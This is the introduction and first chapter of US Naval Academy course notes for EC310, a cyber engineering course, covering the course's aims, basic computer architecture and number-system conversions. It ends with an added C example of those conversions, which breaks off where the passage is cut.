EC310 Notes
Version 2015.1
Patrick Vincent and Agur Adams

Introduction

1. One Command Away from Catastrophe

In his book Worm: The First Digital World War (Atlantic Monthly Press, 2011), author Mark Bowden opines:

Most people, even well-educated people with formidable language skills, folks with more than a passing knowledge of word-processing software and spreadsheets and dynamic graphical displays, people who spend hours every day with their fingertips on keyboards, whose livelihoods and even leisure-time preferences increasingly depend on fluency with a variety of software remain utterly clueless about how any of it works. The innards of mainframes and operating systems and networks are considered not just unfathomable but somehow unknowable, or even not worth knowing, in the way that many people are content to regard electricity as voodoo.

What happens when such people, albeit well-intentioned and bright, use DOD computer networks? The answer: such individuals open their computers and networks to malicious attack. In November 2008, a Pentagon employee arrived for work, parked his car, and noticed thumb drives on the pavement. Not wanting to see resources go to waste, he collected the thumb drives and proceeded to plug one into his office computer, thereby spreading a damaging virus throughout the secure classified network he had access to. Millions of man-hours expended on making a network secure can be wasted by one careless user in the face of a devious foe.

Dr. Paul Vixie, an Internet pioneer and former Chairman of the American Registry for Internet Numbers (ARIN), is famously quoted as saying:

These security problems have been here so long that the only way I’ve been able to function at all is by learning to ignore them. Or else I would be in a constant state of panic, unable to think or act constructively. We have been one command away from catastrophe for a long time now.
And of course adversaries are continuously attempting to breach the security of DOD computers and networks.

In the CNO’s view, the Navy’s information capabilities must evolve from a 20th-century supporting function to a main battery of 21st-century sea power. In this new vision for an information-centric Navy, information will be treated as a weapon across the full range of military operations—on the sea, under the sea, on land, and in the air. The U.S. Navy, in the CNO’s words, “stands on the cusp of a revolution comparable to the introduction of nuclear power into the Fleet.”

USNA has always adapted its academic program to satisfy the relevant needs of the Navy and Marine Corps. The curriculum is continually adjusted in order to ensure that midshipmen are prepared academically for the current and emerging challenges they will face as officers. Against the emerging cyber threat, USNA has deemed it urgent to tailor its program to meet the specific needs of users in cyberspace. Thus, USNA endeavors to graduate officers with a common understanding of the concepts, principles and applications of cyber security in order to ensure the protection and the availability of the Navy’s information systems and networks. This understanding is provided by a two-course sequence: SI110 Introduction to Cyber Security and EC310 Applications of Cyber Engineering.

“A cyber attack perpetrated by nation states or violent extremist groups could be as destructive as the terrorist attack of 9/11. Such a destructive cyber terrorist attack could paralyze the nation.”
Former Defense Secretary Leon E. Panetta, July 2012

“Cyber has escalated from an issue of moderate concern to one of the most serious threats to our national security. We now live in a world of weaponized bits and bytes, where an entire country can be disrupted by the click of a mouse.”
Gen. Martin E. Dempsey, Chairman of the Joint Chiefs of Staff, January 2013

“The United States is not adequately prepared for a serious cyberattack. In terms of preparation for a cyberattack on a critical part of its network infrastructure, the U.S. is at a three on a scale of one to ten.”
Gen. Keith Alexander, Former Director of the National Security Agency, July 2012

You may be thinking to yourself: "I'm going to be a pilot (or a Marine, or a Submariner, etc.). I'm not going to be an Information Warfare Officer. Why do I need to know this?"

The simple answer: If you find yourself at a keyboard interfacing with a Navy system, you are operating in the Navy's cyber domain. The trained and aware user is the first and most vital line of defense. Any officer, in any warfare specialty, may find himself the critical link in his organization’s network security posture.

You WILL learn cyber!

Are we trying to make every midshipman a cyber-security expert? No. Unfortunately, we cannot. However, USNA can make every midshipman better educated to operate in a cyber warfare environment. The aim is not to make every naval officer a cyber specialist; rather, the aim is to recognize and properly respond to the need that every member of the Navy and Marine Corps be aware of the cyber threat and be enabled to operate in this environment. The Navy requires a workforce that is able to continue warfighting operations while defending against cyber attacks. This requires that every user have some level of knowledge. Without officers who understand the security of Navy information systems, and the threats faced, it will be increasingly difficult to protect networks from the growing threats of criminal and state-sponsored intrusions and disruptions. The average naval officer must become one who is informed and interested in cyber warfare and thus able to responsibly inhabit a networked environment.
The goal is to infuse a baseline scientific and academic cyber security education in all midshipmen in order to address the need for cyber-capable unrestricted line officers that understand the threats and vulnerabilities at a basic technical level. So, while you will not leave this course as a cyber security expert, you will obtain the cohesive technical foundation necessary to comprehend cyber topics as you encounter them in upper level courses, in your Professional Development activities, and in the fleet.

But isn't this training, and isn't USNA supposed to be about education?

USNA must instill in its students this new awareness of cyber security, ever mindful of its status as a first-class undergraduate institution. Thus, a proper balance must be maintained between theory and application. Midshipmen at USNA are not trained specifically to operate in the air or under the sea. Instead, they are trained in the basics of hard science to be applied to specific warfare fields. Likewise, a foundation must be provided for officers to operate in the cyber domain. As more military officers find themselves engaged in fighting in cyberspace, they will increasingly need a thorough understanding of the basic technical concepts that underlie battle in this domain. There exists a core of technical academic material that can prepare officers to understand and operate in cyberspace. That core is provided in SI110 and EC310.

Thus, the mission of EC310 is to continue educating each midshipman about cyber infrastructure and systems, inherent cyber vulnerabilities and threats, and appropriate defensive security procedures, thereby enabling them to make principled decisions regarding the potential benefits, consequences, and risks from a proposed use of an information system in today’s cyber warfare environment.
EC310, as its own course, is separate and distinct from SI110, yet intended to be complementary so that it builds upon the student’s existing body of technical knowledge while exposing new theory, principles, and information systems not covered in SI110. It should be enjoyable and technically challenging, yet accessible to the entire student body regardless of major.

2. EC310 Course Objectives

EC310 is not about memorization and regurgitation; rather, the goal is for students to leave the course with an understanding of information systems at a depth sufficient to manipulate their operation in accordance with security principles. The successful student will appreciate the decisions that weigh the cost of design complexity against the cost of security—engineering is often a series of tradeoffs where security must be sacrificed in order to ensure functionality. A main theme which will be revisited again and again is that trust is often an inherent assumption in system design, while security is an afterthought.

Upon completing this course, you should be able to:

1. Describe in depth the principles, mechanisms, and technologies of information systems’ hardware and software in both computers and communications domains, and describe the development of typical exploits used against vulnerabilities in information systems.
2. Identify actions that can be taken to protect information systems’ hardware and software against potential exploits in both computers and communications domains.
3. Trace the lifecycle of a program through development, compilation, and execution to explain the methodology and ramifications of exploiting a process.
4. Discuss steps that should be taken to prevent a process from being exploited.
5. Describe the fundamental networking technologies and design principles behind internetworking and how these can be exploited by malicious actors.
6. Discuss steps that should be taken to prevent networks from being exploited and identify who or what is responsible for performing these preventative actions and where or when they should be applied.
7. Describe, qualitatively and quantitatively, how underlying electromagnetic spectrum technology is implemented in wireless communication and electronic warfare systems.
8. Evaluate the security and robustness of communications systems by determining which characteristics allow a system to transmit sensitive information to an intended receiver across a noisy or vulnerable channel.

3. Note: This Course is Not Easy!

Some courses at USNA are easy—you might find yourself in the occasional course that you can sleep through, limit your studying to just a few hours the night before an exam, and have little difficulty achieving a passing grade. EC310 is not such a course. To do well in EC310, you will need to stay engaged, do the homework, ask questions in class and seek extra instruction at the first sign of trouble. And, for your own good, DO NOT FALL BEHIND!

4. Plan for the Course

The course is divided into three parts. In Part I: The Host, you will examine specific threats against an individual computer in isolation from a network. In Part II: The Network, you will gain an in-depth understanding of how the Internet works today and how fragile its core infrastructure really is. Finally, in Part III: Wireless, you will gain an appreciation for the unique security threats inherent when operating in a wireless environment.

Contents

Introduction ... i
Part I: The Host ... 1
  Chapter 1: Number Systems ... 3
    Reading ... 15
    Problems ... 15
    Security Exercise 1 ... 17
  Chapter 2: C Programs ... 27
    Reading ... 41
    Problems ... 41
    Security Exercise 2 ... 43
  Chapter 3: Assembly Language and Memory ... 57
    Problems ... 79
    Security Exercise 3 ... 85
  Chapter 4: Arrays and Strings ... 95
    Problems ... 105
    Security Exercise 4 ... 109
  Chapter 5: Intro to Pointers ... 115
    Problems ... 123
    Security Exercise 5 ... 125
  Chapter 6: Functions and the Stack ... 135
    Problems ... 149
    Security Exercise 6 ... 153
  Chapter 7: The Buffer Overflow ... 163
    Problems ... 173
    Security Exercise 7 ... 179
  Chapter 8: The Heap ... 187
    Problems ... 195
    Security Exercise 8 ... 197
  Chapter 9: Privilege Management ... 203
    Problems ... 217
    Security Exercise 9 ... 221
  Chapter 10: A Real Buffer Overflow ... 231
    Problems ... 241
    Security Exercise 10 ... 243
Part II: The Network ... 251
  Chapter 11: The TCP/IP Model ... 253
    Problems ... 269
  Chapter 12: Ethernet ... 271
    Problems ... 281
    Security Exercise 12 ... 283
  Chapter 13: Internet Protocol ... 291
    Problems ... 305
    Security Exercise 13 ... 309
  Chapter 14: Routing Part I ... 317
    Problems ... 333
    Security Exercise 14 ... 335
  Chapter 15: Routing Part II ... 349
    Problems ... 361
    Security Exercise 15 ... 365
  Chapter 16: The Man-In-The-Middle Attack ... 375
    Problems ... 385
    Security Exercise 16 ... 389
  Chapter 17: Border Gateway Protocol ... 395
    Problems ... 409
    Security Exercise 17 ... 411
  Chapter 18: Border Gateway Protocol Routing ... 421
    Problems ... 431
    Security Exercise 18 ... 433
Part III: Wireless ... 439
  Chapter 19: Communications Systems, EM Spectrum, and Signals ... 441
    Problems ... 447
    Security Exercise 19 ... 449
  Chapter 20: Intro to Modulation ... 457
    Problems ... 467
    Security Exercise 20 ... 471
  Chapter 21: Analog to Digital Conversion ... 477
    Problems ... 489
  Chapter 22: Digital Modulation ... 491
    Problems ... 501
    Security Exercise 22 ... 503
  Chapter 23: Power Gain and SNR ... 509
    Problems ... 515
    Security Exercise 23 ... 517
  Chapter 24: Antennas ... 523
    Problems ... 533
  Chapter 25: Propagation ... 537
    Problems ... 547
    Security Exercise 25 ... 549
  Chapter 26: Electronic Warfare ... 553
    Security Exercise 26 ... 559
Appendices ... 569
  Basic Linux Commands ... 571
  The Linux File System ... 573
  Brief Primer on gdb ... 577
  Performing Base Conversions on the TI-nSpire CAS Calculator ... 583
  Answers to Selected Problems ... 589

Authorship Notes

The first two parts—The Host and The Network—were drafted for the creation of the Naval Academy course EC310, Applications of Cyber Engineering, during the 2014 academic year. These two sections were substantially revised during the 2015 and 2016 academic years. The third part—Wireless—was largely adapted from an existing course titled EE302, Electronic Communication Systems and Digital Communications. The task of selecting information from EE302 for placement in EC310 was accomplished by Jennie Wood, Chris Anderson, Jessie Atwood, Currie Wooten, Ryan Kelly, John Roth, Justin Blanco, and Ryan Whitty. Of special note, Chapter 25 (drafted by Chris Anderson, Jesse Atwood, and Jennie Wood) consists of new material composed for EC310. Additionally, Security Exercise 26, drafted by Jennie Wood and Chris Anderson, is new for EC310. The entire Wireless section was extensively edited and refined by Rob Ives and John Roth in the Spring of the 2015 academic year.

Acknowledgements

The following faculty members reviewed the entire course and offered many helpful suggestions which greatly improved the course: Justin Blanco, Rita Doerr, Nicholas Rosasco, Kevin Fairbanks, John Roth, Ryan Kelly, Dane Brown, Richard Kopka and Jay Benson. Beth Haneke offered expert advice throughout the process and greatly assisted with editing, formatting, and preparing the manuscript for print.

Part I: The Host

First, we provide an in-depth understanding of how operating systems utilize high-speed memory. Armed with this knowledge, we then describe the methodology of exploiting a process and we describe the tools that can be used to mitigate exploits.

Chapter 1: Number Systems

Objectives:
(a) Discuss the role of the operating system in bridging the gap between hardware and user applications and services.
(b) Explain the relationship between secondary memory, main memory and the CPU.
(c) Explain the meaning of the terms byte, word and half-word.
(d) Convert between binary and decimal notation.
(e) Convert between hexadecimal and decimal notation.
(f) Convert between hexadecimal and binary notation.
(g) Evaluate how characters are stored using ASCII notation.

Let us begin by reviewing the basics of computer architecture, operating systems, and the binary and hexadecimal number systems.

1. Basic Computer Architecture

1.1. Definition of a Computer.

We adopt a very general and expansive definition of a computer. For our purposes, a computer is a device that:

- Accepts input information from input devices.
- Stores data in memory so that it can be processed.
- Processes data (e.g., by performing arithmetic calculations and modifications). This processing of data is done by the Central Processing Unit (CPU) according to instructions provided by the user.
- Produces output (usually the results of the processing) which is delivered to output devices.

Computers can perform complex calculations, search through large amounts of data, and sort huge amounts of information. We can also perform these tasks, but computers can perform them quicker and with greater accuracy.

Computer systems consist of hardware and software. The hardware consists of the actual electrical and mechanical components that make up a computer system. The software consists of the instructions that tell a computer how to do a specific job.

1.2. Input and Output Devices.

Let's briefly discuss the main components of a computer's hardware, referring to Figure 1.1 on the next page. The computer accepts data from input devices. Examples of input devices are the mouse, the keyboard and the network interface card. The computer delivers data to output devices. Examples of output devices are the monitor (i.e., the screen), the printer and the network interface card (the network interface card is both an input and an output device).

Figure 1.1. Basic Computer Architecture

1.3. Memory Concepts.
All of the devices that store data within a computer can only be in one of two states. For example, data might be stored using switches. But an individual switch can only be open or closed—only two states are possible if switches are used. Alternatively, data may be stored on an optical disc. But, the data stored at any specific point on an optical disc is represented by either a dark spot or a light spot—only two states are possible if optical media are used. If, on the other hand, data is stored using capacitors, any individual capacitor can be either charged or uncharged—only two states are possible. If magnetic media are used to store data, the data stored at any point is represented either by a magnetic pole with "north" at the top, or a magnetic pole with "south" at the top—only two states are possible.

Since data can only be represented as one of two states, we refer to one state as a “1” and the other as a “0.” This is a binary scheme. Each individual 1 or 0 is referred to as a binary digit (bit). All data within a computer is stored as bits, which we can think of as a series of 1's and 0's.

A collection of 8 bits is referred to as a byte. A collection of four bytes (32 bits) is referred to as a word.[1] Two bytes is termed a half-word. Bytes are grouped into even larger quantities as:

Kilobyte (KB) - 1024 bytes (2^10 bytes)
Megabyte (MB) - 1,048,576 bytes (2^20 bytes)
Gigabyte (GB) - 1,073,741,824 bytes (2^30 bytes)

A collection of four bits is called a nibble. Ha ha ha ha!!! That one always kills me!

The computer interprets the 1's and 0's as numbers, letters or other information according to a coding scheme. For example, single characters such as individual letters are stored as bytes using a code called the ASCII (American Standard Code for Information Interchange) code. Using ASCII, the letter A is stored as 01000001, the letter a is stored as 01100001, the percent sign % is stored as 00100101, etc.
[1] The number of bits in a word (and even the definition of the term word) is ambiguous. In x86 assembly language, a word is actually defined to be 16 bits. Some sources define a word to be the size of the CPU's internal registers, while others define it as the memory bus width. In EC310 we state that a word is 32 bits since that is the definition used by the gdb debugger to be introduced later.

1.4. Main Memory.

Main memory stores the data that we input, stores the instructions that will process the data, and stores the results of calculations until those results are moved to a permanent location. Think of main memory as the computer's "scratch paper", or as a “waiting room” for data to be held in before and after it is processed. Main memory is also called RAM—random access memory. Main memory is volatile; all data in main memory is lost when the power is turned off.

Main memory can be thought of as a list of numbered locations. The number that identifies a memory location is called the address of the memory location. The computer stores data in a memory location, and then uses the address to retrieve the data when needed. In most computers, each individual memory location within main memory holds one byte of data. We might have four consecutive items—W, X, Y and Z—stored in four consecutive bytes as shown below.

If the computer needs to store in main memory a data item that cannot be stored as a single byte, several adjacent bytes will be used to hold the item. The address of the first of the bytes is used as the address when referencing the data item. In the picture shown below, we say that data items W, X, Y and Z are stored consecutively in memory. The size of the memory location holding data item Y is three bytes. The address of the memory location holding data item Y is 23. Similarly, the address of data item Z is 26, and it is stored in two bytes.

1.5. Secondary Memory.
Secondary memory is more permanent memory that provides long-term storage for data before and after a computer is used. Examples of secondary memory include:

- A computer’s hard disk
- A CD or DVD
- Flash memory (such as a USB stick)

Data in secondary memory is stored in files. A file is a named collection of data.

Note that main and secondary memory serve different purposes. Main memory is very fast but is also very expensive. Main memory is also volatile—all of the data in main memory is lost when you turn off your computer. Secondary memory is much cheaper than main memory, but it is much slower (i.e., accessing data takes much longer). Secondary memory has the additional advantage of being nonvolatile—you do not lose any data on your hard drive when you turn your computer off.

1.6. The Central Processing Unit (CPU).

The CPU is the “brain” of the computer. The CPU circuitry executes the instructions that process data. The CPU takes data and instructions from main memory, processes the data and instructions, and then returns the results to main memory.

The CPU is only able to carry out a small set of very simple instructions. Complex tasks must be broken down into very simple instructions taken from this set. The set of instructions a CPU is able to carry out is termed its instruction set. An instruction in the instruction set tells the CPU to carry out a simple specific arithmetic, logical, control or memory access operation. Sample CPU instructions include:

- Add, subtract, multiply, divide
- Move data from one memory location to another
- Compare two numbers to see which is greater

A CPU might have 100 to perhaps a thousand instructions in its instruction set. These instructions are implemented as electronic circuits on the microprocessor chip.

The CPU only interacts with main memory; it does not interact directly with secondary memory. Since the CPU only interacts with main memory, any program that your computer is running must be in main memory.

1.7. Software.
Software consists of the instructions that tell a computer how to do a specific job. Software specifies how the computer is to accept data from a user and how this data is to be processed. More formally, software is the set of programs used by a computer. So…what is a program? A computer program is a set of detailed instructions for a computer to follow to produce a specific result. A program tells a computer how to interact with a user, perform a task, process data, etc. When we give a computer a program to follow, we are said to be running the program, whereas the computer is said to be executing the program.

The most important software is the operating system. The operating system is a program that is “in charge” of all other programs used by the computer. The operating system controls the computer’s hardware and software resources, and allocates these resources as necessary to accomplish the desired task. Think of the operating system as a traffic cop or an air traffic controller directing and coordinating activities. The operating system acts as an interface between the computer and the user. We “communicate” with a computer via the operating system. For instance, if we want to run an application program, say MSWORD, we “tell” this to the Windows operating system, and the operating system then executes the MSWORD program. Common operating systems include Windows, UNIX, Linux and Apple’s OS X.

We previously mentioned that any program that your computer is running must be in main memory. When your computer is turned off, nothing resides in main memory. When you turn your computer on, the operating system is automatically copied from the hard drive into main memory. When you tell the operating system that you want to run MSWORD (by, for example, clicking on the MSWORD icon), the operating system copies the MSWORD program from your hard drive to main memory.

You may wonder: Can computers think? The answer is: No! Thankfully, no!
Keep in mind: Computers only do what programmers tell them to do (via programs). Computers solve problems after the programmer has formulated a solution.

2. Review of Number Systems

All data in a computer is represented in binary. The pictures of your summer vacation stored on your hard drive—it’s all bits. The YouTube video of the cat falling off the chair that you saw this morning—bits. Your Facebook page—bits. The tweet you sent—bits. The email from your professor telling you to spend less time on vacation, browsing YouTube, updating your Facebook page and sending tweets—that’s bits too. Everything is bits.

We humans think about numbers using the decimal number system because we have ten fingers. Computers have only two fingers, and therefore use the binary number system. We need to be able to readily shift between the binary and decimal number representations. For instance, a decimal number can be represented as a sum of powers of 10. The decimal number 1,234 can be depicted as one digit in each position, each position carrying a weight:

  1 in the $10^3 = 1000$ position (i.e., thousands position)
  2 in the $10^2 = 100$ position (i.e., hundreds position)
  3 in the $10^1 = 10$ position (i.e., tens position)
  4 in the $10^0 = 1$ position (i.e., ones position)

Thus,

  $1{,}234_{10} = 1 \cdot 10^3 + 2 \cdot 10^2 + 3 \cdot 10^1 + 4 \cdot 10^0 = 1000 + 200 + 30 + 4$

2.1. Converting a Binary Number to a Decimal Number

To convert a binary number to a decimal number, we simply write the binary number as a sum of powers of 2. Following the example for decimal numbers, the binary number 1101 can be depicted as:

  1 in the $2^3 = 8$ position (i.e., eights position)
  1 in the $2^2 = 4$ position (i.e., fours position)
  0 in the $2^1 = 2$ position (i.e., twos position)
  1 in the $2^0 = 1$ position (i.e., ones position)

Thus,

  $1101_2 = 1 \cdot 2^3 + 1 \cdot 2^2 + 0 \cdot 2^1 + 1 \cdot 2^0 = 8 + 4 + 0 + 1 = 13_{10}$

As a second example, consider converting the binary number 1011 to a decimal number. We note that the rightmost position is the one’s position and the bit value in this position is a 1.
So, this rightmost bit has the decimal value of $1 \cdot 2^0$. The next position to the left is the two’s position, and the bit value in this position is also a 1. So, this next bit has the decimal value of $1 \cdot 2^1$. The next position to the left is the four’s position, and the bit value in this position is a 0. So, this bit has the decimal value of $0 \cdot 2^2$. The leftmost position is the eight’s position, and the bit value in this position is a 1. So, this leftmost bit has the decimal value of $1 \cdot 2^3$. Thus:

  $1011_2 = 1 \cdot 2^3 + 0 \cdot 2^2 + 1 \cdot 2^1 + 1 \cdot 2^0 = 8 + 0 + 2 + 1 = 11_{10}$

Practice Problem 1.1 Express the binary number 110110 as a decimal number.

Solution:

Given a binary number, you can now convert it to the equivalent decimal number. We will now convert numbers in the other direction: from decimal to binary.

An Aside

Note that we do not cover the speedier method of converting from base-10 to base-2: repeated division by 2, forming the answer from the remainders at each step. In case you do not recall this method, see: https://www.youtube.com/watch?v=Q2UgMYwWiO4 We do not cover this method since it would take too long to explain why this method works (an explanation/proof can be found in any discrete math textbook). The method that we do present in the notes is more laborious to present, and more time-consuming to use, but students have no difficulty in understanding why it works.

2.2. Converting a Decimal Number to a Binary Number

To convert the decimal number x to binary, we express the decimal number as a sum of powers of 2:

Step 1. Find the highest power of two less than or equal to x. The binary representation will have a one in this position. Denote the value of this highest power of 2 as y.

Step 2. Now subtract this power of two (y) from the decimal number (x), denoting the result as z: $z = x - y$.

Step 3. If $z = 0$, you are done. Otherwise, let $x = z$ and return to Step 1 above.

For example, suppose we wanted to convert the decimal number 5 to binary.
We first think to ourselves: “Self, what is the largest power of 2 that is less than or equal to 5?” $2^2 = 4$ is a power of 2 that is less than 5, but is it the largest? Obviously, it is, since $2^3 = 8$. So, the largest power of 2 less than or equal to 5 is $2^2 = 4$, and thus the binary representation of 5 will have a one in the $2^2 = 4$ position:

  $2^2 = 4$ position: 1
  $2^1 = 2$ position: _
  $2^0 = 1$ position: _

Note that we have added placeholders for the positions of all powers of 2 less than $2^2$. Our task now is to determine if these positions should contain a one or a zero. Subtracting 4 from our number 5 gives $5 - 4 = 1$. Thus, 1 is now the number we are working with. We again ask: What is the largest power of 2 that is less than or equal to 1? The answer is $2^0 = 1$, so the binary representation of 5 will have a one in the $2^0 = 1$ position:

  $2^2 = 4$ position: 1
  $2^1 = 2$ position: _
  $2^0 = 1$ position: 1

Now, subtracting $2^0 = 1$ from the number we are working with (also 1) gives 0, so we are done. Filling in zeros in all remaining positions (i.e., all positions that do not have a 1), we have our answer. The decimal number 5 in binary is:

  $2^2 = 4$ position: 1
  $2^1 = 2$ position: 0
  $2^0 = 1$ position: 1

or, $5_{10} = 101_2$.

Practice Problem 1.2 Convert the decimal number 148 to binary.

Solution:

The binary representations of the decimal digits 0 through 15 are shown below.

  Decimal Number   Binary Number
  0                0000
  1                0001
  2                0010
  3                0011
  4                0100
  5                0101
  6                0110
  7                0111
  8                1000
  9                1001
  10               1010
  11               1011
  12               1100
  13               1101
  14               1110
  15               1111

You may be wondering about the leading zeros in the table above. For example, the decimal number 5 is represented in the table as the binary number 0101. We could have represented the binary equivalent of 5 as 101, 00101, 0000000101, or with any other number of leading zeros. All answers are correct.
Sometimes, though, you will be given the size of a storage location. When you are given the size of the storage location, include the leading zeros to show all bits in the storage location. For example, if told to represent decimal value 5 as an 8-bit binary number (i.e., a byte), your answer should be 00000101.

2.3. The Hexadecimal Number System

Why Hexadecimal?

We often have to deal with large positive binary numbers. For instance, consider that computers connect to the Internet using a Network Interface Card (NIC). Every NIC in the world is assigned a unique 48-bit identifier as an Ethernet address. The intent is that no two NICs in the world will have the same address. A sample Ethernet address might be:

  000000000100011101011110011111111001001000110110

As another example, computer engineers must oftentimes look at the contents of a specific item in computer memory. You might, for instance, have to look at a variable that is stored at address:

  00000000000100101111111101111100

You would probably agree that these long binary strings are cumbersome to transcribe or to read off to a coworker. Even if you have come to love the binary number system, you would still likely agree that these long strings are too much of a good thing. Fortunately, large binary numbers can be made much more compact—and hence easier to work with—if represented in base-16, the so-called hexadecimal number system. You may wonder: Binary numbers would also be more compact if represented in base-10—why not just convert them to decimal? The answer, as you will soon see, is that converting between binary and hexadecimal is exceedingly easy—much easier than converting between binary and decimal.
The Hexadecimal (Base-16) Number System has 16 digits:

  0, 1, 2, 3, 4, 5, 6, 7, 8, 9, A, B, C, D, E, F

Note that the single hexadecimal symbol A is equivalent to the decimal number 10, the single symbol B is equivalent to the decimal number 11, and so forth, with the symbol F being equivalent to the decimal number 15. Just as with decimal notation or binary notation, we again write a number as a string of symbols, but now each symbol is one of the 16 possible hexadecimal digits (0 through F). To interpret a hexadecimal number, we multiply each digit by the power of 16 associated with that digit’s position. For example, consider the hexadecimal number 1A9B. Indicating the values associated with the positions of the symbols, this number is illustrated as:

  1 in the $16^3 = 4096$ position
  A in the $16^2 = 256$ position
  9 in the $16^1 = 16$ position
  B in the $16^0 = 1$ position

2.4. Converting a Hexadecimal Number to a Decimal Number.

To convert a hexadecimal number to a decimal number, write the hexadecimal number as a sum of powers of 16. For example, considering the hexadecimal number 1A9B above, we convert this to decimal as:

  $1A9B_{16} = 1 \cdot 16^3 + A \cdot 16^2 + 9 \cdot 16^1 + B \cdot 16^0 = 4096 + 10(256) + 9(16) + 11(1) = 6811$

Practice Problem 1.3 Express the hexadecimal number 3CB as a decimal number.

Solution:

2.5. Converting a Decimal Number to a Hexadecimal Number.

To convert a decimal number to hexadecimal, you use an approach similar to that used in converting a decimal number to binary. But, instead of finding the largest power of 2 less than or equal to the decimal number, you find the largest power of 16 less than or equal to the given decimal number. You then subtract the number of multiples of this largest power of 16 from the given number and repeat the process with the result of the subtraction. For example, to convert the decimal number 746 to hexadecimal, we proceed as follows: We first note that the powers of 16 are: $16^0 = 1$, $16^1 = 16$, $16^2 = 256$, $16^3 = 4096$, ...
and we note that the largest power of 16 less than or equal to 746 is $16^2 = 256$. So, when we convert 746 to hexadecimal, the result will have three hexadecimal digits:

  $16^2$ position: _
  $16^1$ position: _
  $16^0$ position: _

We next determine how many “256's” are in 746. The answer is 2, since (256)(2) = 512 and (256)(3) = 768:

  $16^2$ position: 2
  $16^1$ position: _
  $16^0$ position: _

Now, subtracting (256)(2) from our original decimal value 746 results in 234. We now repeat this process for the decimal value of 234. The largest power of 16 that is less than or equal to 234 is 16. How many 16’s are contained within 234? The answer is 14, since (16)(14) = 224. Since 14 is the hexadecimal digit E, we have:

  $16^2$ position: 2
  $16^1$ position: E
  $16^0$ position: _

Now, subtracting (16)(14) from our decimal value 234 results in 10. We now repeat this process for the decimal value of 10. This is easy… there are 10 one’s (i.e., ten $16^0$'s) in 10…and 10 is the hexadecimal digit A, so we have:

  $16^2$ position: 2
  $16^1$ position: E
  $16^0$ position: A

So, the decimal number 746 = 2EA in hexadecimal.

Note that with hexadecimal notation, as with binary and decimal notation, we must be careful that the base is understood. When we speak of the number “23”, do we mean the decimal number 23 (in base 10), or do we mean the hexadecimal number 23 (which happens to equal 35 in base 10)? If the base is not clear from the context, it can be made explicit by including the base as a subscript as in: $23_{16} = 35_{10}$. Some texts use the prefix 0x to indicate that a number is hexadecimal. That is, instead of writing $23_{16}$ some texts will use the notation 0x23. We will often follow this convention.

Practice Problem 1.4 Convert the decimal number 2576 to hexadecimal.

Solution.

2.6. Converting a Hexadecimal Number to a Binary Number.

Engineers often have to convert between binary and hexadecimal, but this is quite simple to do.
We can convert directly from hexadecimal notation to the equivalent binary representation by using the following procedure:

  Convert each hexadecimal digit to a four digit binary number, independent of the other hexadecimal digits.
  Concatenate the resulting four-bit binary numbers together.

For example, to convert the hexadecimal number 4DA9 to binary, we first convert each hexadecimal digit to a four-bit string:

  4 = 0100
  D = 1101
  A = 1010
  9 = 1001

and then concatenate the results. The resulting binary number is: 0100 1101 1010 1001. We can drop leading zeros (from the leftmost quartet only!), giving us:

  4DA9 = 100110110101001

Practice Problem 1.5 Convert the number 0x13F to binary.

Solution:

2.7. Converting a Binary Number to a Hexadecimal Number.

Converting from binary to hexadecimal entails reversing the procedure for converting from hexadecimal to binary. Specifically, we can convert from binary notation to the equivalent hexadecimal representation by using the following procedure:

  Starting at the right, collect the bits into groups of 4.
  Convert each group of 4 bits into the equivalent hexadecimal digit.
  Concatenate the resulting hexadecimal digits.

For example, to convert 110110101001 to hexadecimal, we collect the bits into groups of 4 starting at the right: 1101 1010 1001, and then we convert each collection of bits into a hexadecimal digit:

  1101 = D
  1010 = A
  1001 = 9

Thus 110110101001 = DA9.

Practice Problem 1.6 Convert the binary number 110101001 to hexadecimal.

Solution:

Practice Problem 1.7 Suppose the first byte of a variable is stored at memory location numbered:

  0 0 0 0 0 0 0 0 0 0 0 1 0 0 1 0 1 1 1 1 1 1 1 1 0 1 1 1 1 1 0 0

We say that this memory location is the address of the variable. What is this variable’s address in hexadecimal notation?

Solution:

Again, the hexadecimal number system simply provides us with a more convenient means of conveying binary quantities.
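The conversions of sections 2.1 through 2.7 (decimal to binary by the largest-power-of-2 method, binary to decimal, hexadecimal to and from decimal by powers of 16, and hexadecimal to and from binary by groups of four bits) collected into one C program. This is an added example written for these notes, not code from the notes or the course; the function names and the fixed-width option of dec_to_bin are the example's own choices, and the values it prints are the worked examples and practice problems above.

```c
#include <ctype.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Added example for sections 2.1-2.7 of these notes (not the notes' own
   code). Each routine follows the positional-weight method the notes use. */

static const char HEX_DIGITS[] = "0123456789ABCDEF";

/* Decimal -> binary, the notes' way: find the largest power of two y <= x,
   put a one in that position, replace x by z = x - y, repeat until z = 0.
   width > 0 keeps that many bits with leading zeros (8 for a byte);
   width == 0 drops leading zeros. out needs room for 33 characters. */
void dec_to_bin(uint32_t x, int width, char *out)
{
    char bits[33];
    memset(bits, '0', 32);
    bits[32] = '\0';
    while (x != 0) {
        int p = 31;                            /* Step 1: largest 2^p <= x */
        while (((uint32_t)1 << p) > x) p--;
        bits[31 - p] = '1';                    /* a one in the 2^p position */
        x -= (uint32_t)1 << p;                 /* Steps 2 and 3: continue with z */
    }
    int start = 0;
    if (width > 0) start = 32 - width;
    else while (start < 31 && bits[start] == '0') start++;
    strcpy(out, bits + start);
}

/* Binary -> decimal: each bit times its power-of-two weight, summed. */
uint32_t bin_to_dec(const char *bin)
{
    uint32_t value = 0;
    for (; *bin; bin++) value = value * 2 + (uint32_t)(*bin - '0');
    return value;
}

/* Hexadecimal -> decimal: each digit times its power-of-16 weight, with
   A..F read as 10..15. Stops at the first character that is not a hex digit. */
uint32_t hex_to_dec(const char *hex)
{
    uint32_t value = 0;
    for (; *hex; hex++) {
        const char *d = strchr(HEX_DIGITS, toupper((unsigned char)*hex));
        if (d == NULL) break;
        value = value * 16 + (uint32_t)(d - HEX_DIGITS);
    }
    return value;
}

/* Decimal -> hexadecimal, the notes' way: largest power of 16 <= x, count how
   many of it fit, subtract them, move on to the next lower position. */
void dec_to_hex(uint32_t x, char *out)
{
    uint32_t pow16 = 1;
    int n = 0;
    while (pow16 <= x / 16) pow16 *= 16;       /* largest 16^k <= x */
    do {
        uint32_t count = x / pow16;            /* how many pow16's are in x */
        out[n++] = HEX_DIGITS[count];          /* count is always 0..15 here */
        x -= count * pow16;
        pow16 /= 16;
    } while (pow16 > 0);
    out[n] = '\0';
}

/* Hexadecimal -> binary (section 2.6): expand each digit to four bits on its
   own and concatenate; drop_leading removes zeros from the leftmost quartet. */
void hex_to_bin(const char *hex, int drop_leading, char *out)
{
    static const char *nibble[16] = {
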